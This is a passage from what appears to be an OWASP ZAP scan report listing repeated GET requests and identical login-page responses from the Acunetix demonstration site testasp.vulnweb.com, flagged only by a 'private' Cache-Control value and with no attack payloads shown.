| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td 